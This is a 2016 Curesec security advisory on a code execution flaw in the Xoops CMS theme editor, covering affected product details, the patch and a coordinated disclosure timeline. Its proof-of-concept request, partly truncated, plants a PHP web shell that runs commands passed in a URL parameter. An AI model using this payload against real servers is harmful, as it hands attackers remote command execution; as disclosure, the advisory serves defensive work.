Xoops Code Execution

Xoops Code Execution

Date: 2016-01-28 09:44:26
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Xoops
Fixed in: Patch
Patch Link: http://xoops.org/modules/news/article.php?storyid=6747
Vendor Website: http://xoops.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 01/28/2016
Release mode: Coordinated Release
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH

2. Overview

Xoops is a content management system written in PHP. In version, it is vulnerable to code execution.

The theme editor allows the editing of CSS and HTML files. However, an authenticated attacker can edit the request to create new PHP files, leading to code execution.

An admin account is required for successful exploitation, but the request does not have CSRF protection, making CSRF an additional attack vector for this issue.

3. Proof of Concept

POST /xoops- HTTP/1.1 templates=<?php passthru($_GET['x']);&path_file=%2Fvar%2Fwww%2Fxoops-

4. Solution

To mitigate this issue please apply the security patch:


Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 CVE requested, but not assigned
12/10/2015 Reminded Vendor of Disclosure Date
12/11/2015 Vendor requests more time
01/02/2016 Vendor releases patch
01/28/2016 Disclosed to public